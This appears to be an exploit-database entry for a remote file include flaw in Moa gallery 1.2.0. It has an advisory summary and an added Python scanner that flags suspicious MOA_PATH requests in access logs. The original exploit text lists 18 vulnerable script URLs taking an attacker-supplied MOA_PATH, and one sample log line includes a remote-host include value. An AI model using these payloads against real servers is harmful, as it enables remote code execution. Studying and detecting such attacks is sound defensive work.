Vendor: Moa gallery
By: cr4wl3r
CVSS: 9,3 (HIGH)
Remote File Include
CWE: 98
Product Name: Moa gallery
Affected Version From: 1.2.0
Affected Version To: 1.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:moagallery:moa_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Moa gallery <= 1.2.0 Multiple Remote File Include Vulnerability

Moa gallery versions 1.2.0 and prior are vulnerable to multiple remote file include vulnerabilities. An attacker can exploit them by sending a maliciously crafted HTTP request that sets the MOA_PATH parameter of one of the scripts under sources/ on the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Moa gallery.
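
Detection logic for the requests this advisory describes, added here as an example and not part of the original advisory or of Moa gallery: it scans web-server access logs for requests to a .php script under sources/ that carry a MOA_PATH query parameter. The log lines are constructed, and it assumes that legitimate clients never supply MOA_PATH in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Aug/2009:10:01:02 +0000] "GET /gallery/index.php HTTP/1.1" 200 5120
203.0.113.9 - - [26/Aug/2009:10:02:11 +0000] "GET /gallery/sources/page_login.php?MOA_PATH=http%3A%2F%2Fremote.example%2Finc.txt%3F HTTP/1.1" 200 312
203.0.113.9 - - [26/Aug/2009:10:02:15 +0000] "GET /gallery/sources/_template_parser.php?MOA_PATH=/var/www/gallery/ HTTP/1.1" 200 0
198.51.100.4 - - [26/Aug/2009:10:03:40 +0000] "GET /gallery/sources/mod_tag_view.php HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SOURCES_SCRIPT_RE = re.compile(r"/sources/([^/]+\.php)$")
# Two or more scheme characters, so http:, ftp:, php:, data: match but "C:" does not.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)


def scan(log_text):
    """Return one finding per MOA_PATH value sent to a script under sources/."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target, status = m.groups()
        parts = urlsplit(target)
        script = SOURCES_SCRIPT_RE.search(parts.path)
        if not script:
            continue  # request is not for a script under sources/
        # parse_qs percent-decodes values; PHP variable names are case-sensitive.
        for value in parse_qs(parts.query, keep_blank_values=True).get("MOA_PATH", []):
            findings.append({
                "client": client,
                "script": script.group(1),
                "value": value,
                "kind": "url-scheme" if SCHEME_RE.match(value) else "path",
                "status": int(status),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['client']} {f['script']} kind={f['kind']} "
              f"status={f['status']} value={f['value']!r}")
```

Access logs record only the query string, so a value sent in a request body or cookie would not show up here.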

Exploit-DB raw data:

######################################################################
#[x] Moa gallery <= 1.2.0 Multiple Remote File Include Vulnerability                    	  
#[!] Download             :  http://sourceforge.net/projects/moagallery/files/                      		  
#[!] Author               :  cr4wl3r                                   		  
#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org              		  
#[!] Location             :  Gorontalo - INDONESIA                     		  
#[!] Dork                 :  "Tanyakan Pada Rumput Yang Bergoyang"     		  
######################################################################

[x] 3xplo!t :                                                         		  
                                                                                  
http://localhost/[path]/sources/_error_funcs.php?MOA_PATH=[AvriLhea]
http://localhost/[path]/sources/_integrity_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_component_gallery.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/_template_parser.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_gallery_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_image_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_tag_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_upgrade_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/mod_user_funcs.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_admin.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_gallery_view.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_add.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_image_view_full.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_login.php?MOA_PATH=[AvriLhea]          
http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea]          

######################################################################
#[!] Greetz : MyMom [alm]  
#                                                                        
#[!] Special Thanks : str0ke, google, All MusLiM HacKers  
#
#[!] Thanks 2 : Irvian, xoron
#
#[!] Best wishes for observing the Ramadan fast, 1430H
######################################################################

# milw0rm.com [2009-08-26]